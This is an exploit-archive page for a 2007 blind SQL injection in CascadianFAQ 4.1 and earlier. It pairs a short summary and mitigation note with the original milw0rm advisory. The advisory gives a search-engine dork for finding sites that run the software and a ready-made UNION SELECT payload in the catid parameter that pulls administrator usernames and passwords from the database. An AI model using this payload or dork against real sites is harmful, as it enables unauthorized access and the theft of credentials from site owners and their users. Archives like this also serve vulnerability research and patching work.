header-logo
Suggest Exploit
vendor:
CascadianFAQ
by:
ajann
7.5
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: CascadianFAQ
Affected Version From: CascadianFAQ <= 4.1
Affected Version To: CascadianFAQ <= 4.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

The vulnerability exists in the index.php file of CascadianFAQ version 4.1 and earlier. By manipulating the catid parameter, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. An example of a working exploit is provided in the text.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of CascadianFAQ or apply appropriate input sanitization to the catid parameter.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://eclectic-designs.com
# $$      :  Free
# Dork    :  This FAQ is powered by CascadianFAQ
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?catid=[SQL]

Example:

//index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-30]